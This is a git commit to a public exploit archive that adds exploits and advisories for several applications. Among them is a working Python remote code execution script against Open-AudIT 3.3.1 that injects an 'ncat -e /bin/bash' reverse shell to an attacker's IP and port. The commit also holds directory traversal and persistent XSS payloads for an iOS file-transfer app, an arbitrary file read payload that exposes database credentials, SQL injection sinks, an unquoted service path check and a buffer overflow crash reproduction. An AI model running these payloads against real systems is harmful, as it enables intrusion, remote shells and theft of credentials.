DB: 2020-04-30
8 changes to exploits/shellcodes Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC) EmEditor 19.8 - Insecure File Permissions Druva inSync Windows Client 6.5.2 - Local Privilege Escalation Open-AudIT Professional 3.3.1 - Remote Code Execution School ERP Pro 1.0 - Arbitrary File Read Easy Transfer 1.7 for iOS - Directory Traversal hits script 1.0 - 'item_name' SQL Injection
This commit is contained in:
parent
0f5a9de36d
commit
a99d181f24
9 changed files with 816 additions and 0 deletions
187
exploits/ios/webapps/48395.txt
Normal file
187
exploits/ios/webapps/48395.txt
Normal file
|
@ -0,0 +1,187 @@
|
||||||
|
# Title: Easy Transfer 1.7 for iOS - Directory Traversal
|
||||||
|
# Author: Vulnerability Laboratory
|
||||||
|
# Date: 2020-04-27
|
||||||
|
# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
https://www.vulnerability-lab.com/get_content.php?id=2223
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
7.1
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Rubikon Teknoloji
|
||||||
|
Product: Easy Transfer v1.7 - iOS Mobile Web-Application
|
||||||
|
(Copy of the Homepage:
|
||||||
|
https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2020-04-27: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
1.1
|
||||||
|
A directory traversal web vulnerability has been discovered in the Easy
|
||||||
|
Transfer Wifi Transfer v1.7 ios mobile application.
|
||||||
|
The vulnerability allows remote attackers to change the application path
|
||||||
|
in performed requests to compromise the local application
|
||||||
|
or file-system of a mobile device. Attackers are for example able to
|
||||||
|
request environment variables or a sensitive system path.
|
||||||
|
|
||||||
|
The directory-traversal web vulnerability is located in the main
|
||||||
|
application path request performed via GET method. Attackers are
|
||||||
|
able to request for example the local path variables of the web-server
|
||||||
|
by changing the local path in the performed request itself.
|
||||||
|
In a first request the attack changes the path, the host redirects to
|
||||||
|
complete the adress with "..". Then the attacker just
|
||||||
|
attaches /.. a final slash to its request and the path can be accessed
|
||||||
|
via web-browser to download or list local files.
|
||||||
|
|
||||||
|
Exploitation of the directory traversal web vulnerability requires no
|
||||||
|
privileged web-application user account or user interaction.
|
||||||
|
Successful exploitation of the vulnerability results in information
|
||||||
|
leaking by unauthorized file access and mobile application compromise.
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
Multiple persistent cross site scripting vulnerability has been
|
||||||
|
discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
|
||||||
|
The vulnerability allows remote attackers to inject own malicious script
|
||||||
|
codes with persistent attack vector to compromise the mobile
|
||||||
|
web-application from the application-side.
|
||||||
|
|
||||||
|
The persistent vulnerabilities are located in the `Create Folder` and
|
||||||
|
`Move/Edit` functions. Attackers are able to inject own malicious
|
||||||
|
script codes to the `oldPath`, `newPath` and `path` parameters. The
|
||||||
|
request method to inject is POST and the attack vector is located on
|
||||||
|
the application-side.
|
||||||
|
|
||||||
|
Successful exploitation of the vulnerability results in session
|
||||||
|
hijacking, persistent phishing attacks, persistent external redirects
|
||||||
|
to malicious source and persistent manipulation of affected application
|
||||||
|
modules.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Create Folder
|
||||||
|
[+] Move/Edit
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] oldPath
|
||||||
|
[+] newPath
|
||||||
|
[+] path
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The directory traversal web vulnerability can be exploited by remote
|
||||||
|
attackers with wifi network access without user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the
|
||||||
|
provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Exploitation
|
||||||
|
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
|
||||||
|
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
|
||||||
|
|
||||||
|
[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs [GET] --- (list)
|
||||||
|
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
|
||||||
|
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
|
||||||
|
Host: localhost
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Connection: keep-alive
|
||||||
|
-
|
||||||
|
GET: HTTP/1.1 200 OK
|
||||||
|
Content-Length: 213
|
||||||
|
Content-Type: application/json
|
||||||
|
Connection: Close
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The persistent input validation web vulnerabilities can be exploited by
|
||||||
|
remote attackers with wifi network access with low user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the
|
||||||
|
provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Exploitation
|
||||||
|
<scriptx00>alert(document.domain)</script>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] --- (Create & Move)
|
||||||
|
http://localhost/create
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
||||||
|
Gecko/20100101 Firefox/75.0
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 47
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: http://localhost/
|
||||||
|
path=/test<scriptx00>alert(document.domain)</script>
|
||||||
|
-
|
||||||
|
POST: HTTP/1.1 200 OK
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Content-Length: 2
|
||||||
|
Content-Type: application/json
|
||||||
|
Connection: Close
|
||||||
|
-
|
||||||
|
http://localhost/move
|
||||||
|
Host: localhost
|
||||||
|
Accept: application/json, text/javascript, */*; q=0.01
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
Content-Length: 69
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: http://localhost/
|
||||||
|
oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script>
|
||||||
|
-
|
||||||
|
POST: HTTP/1.1 200 OK
|
||||||
|
Content-Length: 411
|
||||||
|
Content-Type: text/html; charset=utf-8
|
||||||
|
Connection: Close
|
||||||
|
- [GET] (Execution)
|
||||||
|
http://localhost/evil.source
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
||||||
|
Gecko/20100101 Firefox/75.0
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: http://localhost/
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability-Lab -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||||
|
Benjamin Kunz Mejri -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
131
exploits/php/webapps/48393.py
Executable file
131
exploits/php/webapps/48393.py
Executable file
|
@ -0,0 +1,131 @@
|
||||||
|
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
|
||||||
|
# Date: 2020-04-22
|
||||||
|
# Exploit Author: Askar
|
||||||
|
# CVE: CVE-2020-8813
|
||||||
|
# Vendor Homepage: https://opmantek.com/
|
||||||
|
# Version: v3.3.1
|
||||||
|
# Tested on: Ubuntu 18.04 / PHP 7.2.24
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import warnings
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from urllib.parse import quote
|
||||||
|
|
||||||
|
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
|
||||||
|
|
||||||
|
|
||||||
|
if len(sys.argv) !=3D 6:
|
||||||
|
print("[~] Usage : ./openaudit-exploit.py url username password ip port=
|
||||||
|
")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
url =3D sys.argv[1]
|
||||||
|
username =3D sys.argv[2]
|
||||||
|
password =3D sys.argv[3]
|
||||||
|
ip =3D sys.argv[4]
|
||||||
|
port =3D sys.argv[5]
|
||||||
|
|
||||||
|
request =3D requests.session()
|
||||||
|
|
||||||
|
def inject_payload():
|
||||||
|
configuration_path =3D url+"/en/omk/open-audit/configuration/90"
|
||||||
|
data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
|
||||||
|
:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
|
||||||
|
port)
|
||||||
|
request.patch(configuration_path, data)
|
||||||
|
print("[+] Payload injected in settings")
|
||||||
|
|
||||||
|
|
||||||
|
def start_discovery():
|
||||||
|
discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
|
||||||
|
post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
|
||||||
|
scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
|
||||||
|
ange(10)])
|
||||||
|
req =3D request.get(discovery_path)
|
||||||
|
|
||||||
|
response =3D req.text
|
||||||
|
soup =3D BeautifulSoup(response, "html5lib")
|
||||||
|
token =3D soup.findAll('input')[5].get("value")
|
||||||
|
buttons =3D soup.findAll("button")
|
||||||
|
headers =3D {"Referer" : discovery_path}
|
||||||
|
request_data =3D {
|
||||||
|
"data[attributes][name]":scan_name,
|
||||||
|
"data[attributes][other][subnet]":"10.10.10.1/24",
|
||||||
|
"data[attributes][other][ad_server]":"",
|
||||||
|
"data[attributes][other][ad_domain]":"",
|
||||||
|
"submit":"",
|
||||||
|
"data[type]":"discoveries",
|
||||||
|
"data[access_token]":token,
|
||||||
|
"data[attributes][complete]":"y",
|
||||||
|
"data[attributes][org_id]":"1",
|
||||||
|
"data[attributes][type]":"subnet",
|
||||||
|
"data[attributes][devices_assigned_to_org]":"",
|
||||||
|
"data[attributes][devices_assigned_to_location]":"",
|
||||||
|
"data[attributes][other][nmap][discovery_scan_option_id]":"1",
|
||||||
|
"data[attributes][other][nmap][ping]":"y",
|
||||||
|
"data[attributes][other][nmap][service_version]":"n",
|
||||||
|
"data[attributes][other][nmap][open|filtered]":"n",
|
||||||
|
"data[attributes][other][nmap][filtered]":"n",
|
||||||
|
"data[attributes][other][nmap][timing]":"4",
|
||||||
|
"data[attributes][other][nmap][nmap_tcp_ports]":"0",
|
||||||
|
"data[attributes][other][nmap][nmap_udp_ports]":"0",
|
||||||
|
"data[attributes][other][nmap][tcp_ports]":"22,135,62078",
|
||||||
|
"data[attributes][other][nmap][udp_ports]":"161",
|
||||||
|
"data[attributes][other][nmap][timeout]":"",
|
||||||
|
"data[attributes][other][nmap][exclude_tcp_ports]":"",
|
||||||
|
"data[attributes][other][nmap][exclude_udp_ports]":"",
|
||||||
|
"data[attributes][other][nmap][exclude_ip]":"",
|
||||||
|
"data[attributes][other][nmap][ssh_ports]":"22",
|
||||||
|
"data[attributes][other][match][match_dbus]":"",
|
||||||
|
"data[attributes][other][match][match_fqdn]":"",
|
||||||
|
"data[attributes][other][match][match_dns_fqdn]":"",
|
||||||
|
"data[attributes][other][match][match_dns_hostname]":"",
|
||||||
|
"data[attributes][other][match][match_hostname]":"",
|
||||||
|
"data[attributes][other][match][match_hostname_dbus]":"",
|
||||||
|
"data[attributes][other][match][match_hostname_serial]":"",
|
||||||
|
"data[attributes][other][match][match_hostname_uuid]":"",
|
||||||
|
"data[attributes][other][match][match_ip]":"",
|
||||||
|
"data[attributes][other][match][match_ip_no_data]":"",
|
||||||
|
"data[attributes][other][match][match_mac]":"",
|
||||||
|
"data[attributes][other][match][match_mac_vmware]":"",
|
||||||
|
"data[attributes][other][match][match_serial]":"",
|
||||||
|
"data[attributes][other][match][match_serial_type]":"",
|
||||||
|
"data[attributes][other][match][match_sysname]":"",
|
||||||
|
"data[attributes][other][match][match_sysname_serial]":"",
|
||||||
|
"data[attributes][other][match][match_uuid]":""
|
||||||
|
|
||||||
|
}
|
||||||
|
print("[+] Creating discovery ..")
|
||||||
|
req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
|
||||||
|
=3Dheaders, allow_redirects=3DFalse)
|
||||||
|
disocvery_url =3D url + req.headers['Location'] + "/execute"
|
||||||
|
print("[+] Triggering payload ..")
|
||||||
|
print("[+] Check your nc ;)")
|
||||||
|
request.get(disocvery_url)
|
||||||
|
|
||||||
|
|
||||||
|
def login():
|
||||||
|
login_info =3D {
|
||||||
|
"redirect_url": "/en/omk/open-audit",
|
||||||
|
"username": username,
|
||||||
|
"password": password
|
||||||
|
}
|
||||||
|
login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
|
||||||
|
fo)
|
||||||
|
login_text =3D login_request.text
|
||||||
|
if "There was an error authenticating" in login_text:
|
||||||
|
return False
|
||||||
|
else:
|
||||||
|
return True
|
||||||
|
|
||||||
|
if login():
|
||||||
|
print("[+] LoggedIn Successfully")
|
||||||
|
inject_payload()
|
||||||
|
start_discovery()
|
||||||
|
else:
|
||||||
|
print("[-] Cannot login!")
|
42
exploits/php/webapps/48394.txt
Normal file
42
exploits/php/webapps/48394.txt
Normal file
|
@ -0,0 +1,42 @@
|
||||||
|
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
|
||||||
|
# Date: 2020-04-28
|
||||||
|
# Author: Besim ALTINOK
|
||||||
|
# Vendor Homepage: http://arox.in
|
||||||
|
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
|
||||||
|
# Version: latest version
|
||||||
|
# Tested on: Xampp
|
||||||
|
# Credit: İsmail BOZKURT
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
Vulnerable code: (/student_staff/download.php)
|
||||||
|
- File Name: download.php
|
||||||
|
- Content of the download.php
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
|
||||||
|
$file = $_REQUEST['document'];
|
||||||
|
header("Content-type: application/force-download");
|
||||||
|
header("Content-Transfer-Encoding: Binary");
|
||||||
|
header("Content-length: ".filesize($file));
|
||||||
|
header("Content-disposition: attachment; filename=\"".$file."\"");
|
||||||
|
readfile($file);
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
------------
|
||||||
|
*Payload:*
|
||||||
|
---------------
|
||||||
|
|
||||||
|
http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
|
||||||
|
------------------------
|
||||||
|
*After run payload: (we accessed of the file content)*
|
||||||
|
------------------------
|
||||||
|
|
||||||
|
<?php
|
||||||
|
|
||||||
|
define('DB_SERVER', 'localhost');
|
||||||
|
define('DB_SERVER_USERNAME', 'aroxi********');
|
||||||
|
define('DB_SERVER_PASSWORD', 'erp**********');
|
||||||
|
define('DB_DATABASE', 'aroxi****************');
|
||||||
|
?>
|
100
exploits/php/webapps/48399.txt
Normal file
100
exploits/php/webapps/48399.txt
Normal file
|
@ -0,0 +1,100 @@
|
||||||
|
# Exploit Title: hits script 1.0 - 'item_name' SQL Injection
|
||||||
|
# Date: 2020-04-27
|
||||||
|
# Exploit Author: SajjadBnd
|
||||||
|
# Vendor Homepage: https://hits.ir
|
||||||
|
# Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip
|
||||||
|
# Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Win10 Professional x64
|
||||||
|
|
||||||
|
[ description of script ]
|
||||||
|
|
||||||
|
With this script you can set up a site to exchange statistics and traffic as well as
|
||||||
|
increase rankings. In this script, it is possible to exchange Google +1,
|
||||||
|
exchange Facebook points, exchange Twitter followers,
|
||||||
|
exchange YouTube visitors, exchange visit statistics.
|
||||||
|
|
||||||
|
[ poc ]
|
||||||
|
|
||||||
|
file : ipn.php
|
||||||
|
|
||||||
|
parameters : 'item_name' , 'item_number'
|
||||||
|
method : POST
|
||||||
|
source [
|
||||||
|
|
||||||
|
36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'"));
|
||||||
|
19: $item_name = $_POST['item_name'];
|
||||||
|
20: $item_number = $_POST['item_number'];
|
||||||
|
|
||||||
|
requires:
|
||||||
|
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
|
||||||
|
31: if(!$fp) else
|
||||||
|
35: if(strcmp($res, "VERIFIED") == 0)
|
||||||
|
|
||||||
|
]
|
||||||
|
|
||||||
|
parameter : 'custom'
|
||||||
|
method : POST
|
||||||
|
source [
|
||||||
|
|
||||||
|
43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'");
|
||||||
|
27: $custom = $_POST['custom'];
|
||||||
|
|
||||||
|
requires:
|
||||||
|
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
|
||||||
|
31: if(!$fp) else
|
||||||
|
35: if(strcmp($res, "VERIFIED") == 0)
|
||||||
|
41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
|
||||||
|
|
||||||
|
]
|
||||||
|
|
||||||
|
parameters : 'item_name','mc_gross'
|
||||||
|
method : POST
|
||||||
|
source [
|
||||||
|
|
||||||
|
44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())");
|
||||||
|
19: $item_name = $_POST['item_name'];
|
||||||
|
22: $payment_amount = $_POST['mc_gross'];
|
||||||
|
|
||||||
|
requires:
|
||||||
|
4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
|
||||||
|
31: if(!$fp) else
|
||||||
|
35: if(strcmp($res, "VERIFIED") == 0)
|
||||||
|
41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
|
||||||
|
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
file : register.php
|
||||||
|
|
||||||
|
parameters : 'PlusREF','register'
|
||||||
|
method : COOKIE,POST
|
||||||
|
source [
|
||||||
|
|
||||||
|
22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'");
|
||||||
|
21: $ref = $_COOKIE['PlusREF'];
|
||||||
|
|
||||||
|
requires:
|
||||||
|
3: if(isset($_POST['register']))
|
||||||
|
19: if(!checkpwd ($sec['password'], $sec['password2'])) else
|
||||||
|
20: if(isset($_COOKIE['PlusREF']))
|
||||||
|
|
||||||
|
]
|
||||||
|
|
||||||
|
&
|
||||||
|
|
||||||
|
source [
|
||||||
|
|
||||||
|
40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or
|
||||||
|
37: $final = visitorip ();
|
||||||
|
39: $passc = md5($passa);
|
||||||
|
38: $passa = $sec['password'];
|
||||||
|
38: $passa = $sec['password'];
|
||||||
|
21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)),
|
||||||
|
26: $activare = rand(000000000, 999999909);
|
||||||
|
|
||||||
|
requires:
|
||||||
|
3: if(isset($_POST['register']))
|
||||||
|
19: if(!checkpwd ($sec['password'], $sec['password2'])) else
|
||||||
|
|
||||||
|
]
|
34
exploits/windows/local/48396.txt
Normal file
34
exploits/windows/local/48396.txt
Normal file
|
@ -0,0 +1,34 @@
|
||||||
|
# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
|
||||||
|
# Discovery by: Roberto Piña
|
||||||
|
# Discovery Date: 2020-04-28
|
||||||
|
# Vendor Homepage: https://andreaelectronics.com/
|
||||||
|
# Software Link : https://andreaelectronics.com/
|
||||||
|
# Tested Version: 1.0.64.7
|
||||||
|
# Vulnerability Type: Unquoted Service Path
|
||||||
|
# Tested on OS: Windows 10 Pro x64 es
|
||||||
|
|
||||||
|
# Step to discover Unquoted Service Path:
|
||||||
|
|
||||||
|
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
|
||||||
|
Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
|
||||||
|
|
||||||
|
C:\>sc qc AESTFilters
|
||||||
|
[SC] QueryServiceConfig CORRECTO
|
||||||
|
|
||||||
|
NOMBRE_SERVICIO: AESTFilters
|
||||||
|
TIPO : 10 WIN32_OWN_PROCESS
|
||||||
|
TIPO_INICIO : 2 AUTO_START
|
||||||
|
CONTROL_ERROR : 1 NORMAL
|
||||||
|
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
|
||||||
|
GRUPO_ORDEN_CARGA :
|
||||||
|
ETIQUETA : 0
|
||||||
|
NOMBRE_MOSTRAR : Andrea ST Filters Service
|
||||||
|
DEPENDENCIAS :
|
||||||
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
||||||
|
|
||||||
|
|
||||||
|
#Exploit:
|
||||||
|
# A successful attempt would require the local user to be able to insert their code in the system root path
|
||||||
|
# undetected by the OS or other security applications where it could potentially be executed during
|
||||||
|
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
||||||
|
# privileges of the application.
|
193
exploits/windows/local/48397.txt
Normal file
193
exploits/windows/local/48397.txt
Normal file
|
@ -0,0 +1,193 @@
|
||||||
|
# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
|
||||||
|
# Author: Vulnerability Laboratory
|
||||||
|
# Date: 2020-04-28
|
||||||
|
# Vendor: https://www.internetdownloadmanager.com
|
||||||
|
# Software: https://www.internetdownloadmanager.com/download.html
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
https://www.vulnerability-lab.com/get_content.php?id=2236
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
7.1
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2020-04-28: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
(Copy of the Homepage:
|
||||||
|
https://www.internetdownloadmanager.com/support/about_us.html )
|
||||||
|
(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
Multiple stack buffer overflow vulnerabilities has been discovered in
|
||||||
|
the official Internet Download Manager v6.37.11.1 software.
|
||||||
|
The bufer overflow allows to overwrite registers of the process to
|
||||||
|
compromise the file-system by elevates local process privileges.
|
||||||
|
|
||||||
|
1.1
|
||||||
|
The first stack buffer overflow is located in the `search` function of
|
||||||
|
the downloads menu. The search function itself does not use
|
||||||
|
any secure restriction in the requested search variable of the inputs.
|
||||||
|
Local attackers with access to the software are able to overflow
|
||||||
|
the registers to elevate local process privileges. Thus allows a local
|
||||||
|
attacker to compromise the local computer- or file-system.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The second stack buffer overflow is located in the `Export/Import`
|
||||||
|
function of the tasks menu. Local users are able to import and
|
||||||
|
export the download tasks as *.ef2 file. Local attackers are able to
|
||||||
|
import manipulated *.ef2 files with manipulated referer and
|
||||||
|
source url to overwrite the eip register. The issue occurs because of
|
||||||
|
the insufficient ef2 filetype (context) validation process
|
||||||
|
that does not perform any length restrictions.
|
||||||
|
|
||||||
|
The security risk of the local stack buffer overflow vulnerabilities in
|
||||||
|
the software are estimated as high with a cvss count of 7.1.
|
||||||
|
Exploitation of the buffer overflow vulnerability requires a low
|
||||||
|
privilege or restricted system user account without user interaction.
|
||||||
|
Successful exploitation of the vulnerability results in overwrite of the
|
||||||
|
active registers to compromise of the computer system or process.
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Search
|
||||||
|
[+] Import/Export (ef2)
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The stack buffer overflow vulnerability can be exploited by local
|
||||||
|
attackers with system user privileges without user interaction.
|
||||||
|
For security demonstration or to reproduce the local vulnerability
|
||||||
|
follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Open the software
|
||||||
|
2. Click the downloads menu and open the search
|
||||||
|
3. Inject a large unicode payload inside the search input field and transmit
|
||||||
|
4. The software crashs with several uncaught exception because of
|
||||||
|
overwritten register (0168D8F0)
|
||||||
|
5. Successful reproduce of the local buffer overflow vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
--- Debug Logs (0168D8F0) ---
|
||||||
|
00d61850 668b08 mov cx,word ptr [eax] ds:002b:41414141
|
||||||
|
-
|
||||||
|
00D6186D |. 56 PUSH ESI ; /Arg1
|
||||||
|
-
|
||||||
|
00D61882 |. E8 59FFFFFF CALL IDMan.00D617E0 ;
|
||||||
|
IDMan.00D617E0
|
||||||
|
-
|
||||||
|
00D6189B |> 50 PUSH EAX ; /Arg1
|
||||||
|
-
|
||||||
|
00D6189E |. E8 3DFFFFFF CALL IDMan.00D617E0 ;
|
||||||
|
IDMan.00D617E0
|
||||||
|
-
|
||||||
|
Call stack
|
||||||
|
Address=0168C79C
|
||||||
|
Stack=00DFE0F2
|
||||||
|
Procedure / arguments=IDMan.00D617E0
|
||||||
|
Called from=IDMan.00DFE0ED
|
||||||
|
Frame=0168E02C
|
||||||
|
-
|
||||||
|
SEH chain
|
||||||
|
Address SE handler
|
||||||
|
0168C790 IDMan.00F751E8
|
||||||
|
0168D8F0 41414141
|
||||||
|
-
|
||||||
|
EAX 41414141
|
||||||
|
ECX 01680000
|
||||||
|
EDX 41414141
|
||||||
|
EBX 00000001
|
||||||
|
ESP 0168C76C
|
||||||
|
EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
|
||||||
|
ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
|
||||||
|
EDI 00410043
|
||||||
|
EIP 00D61850 IDMan.00D61850
|
||||||
|
Executable modules
|
||||||
|
Base=00D60000
|
||||||
|
Size=00539000 (5476352.)
|
||||||
|
Entry=00F5CB1C IDMan.<ModuleEntryPoint>
|
||||||
|
Name=IDMan
|
||||||
|
File version=6, 37, 11, 2
|
||||||
|
Path=C:Program Files (x86)Internet Download ManagerIDMan.exe
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The stack buffer overflow vulnerability can be exploited by local
|
||||||
|
attackers with system user privileges without user interaction.
|
||||||
|
For security demonstration or to reproduce the local vulnerability
|
||||||
|
follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Open the software
|
||||||
|
2. Start the bof_poc.pl
|
||||||
|
3. Open the tasks menu
|
||||||
|
4. Click import and import *.ef2 poc
|
||||||
|
Note: The software process crashs on import with uncaught exception
|
||||||
|
5. Successful reproduce of the local buffer overflow vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
Usage Example: Export/Import (*.ef2)
|
||||||
|
<
|
||||||
|
https://www.vulnerability-lab.com/download_content.php?id=1337
|
||||||
|
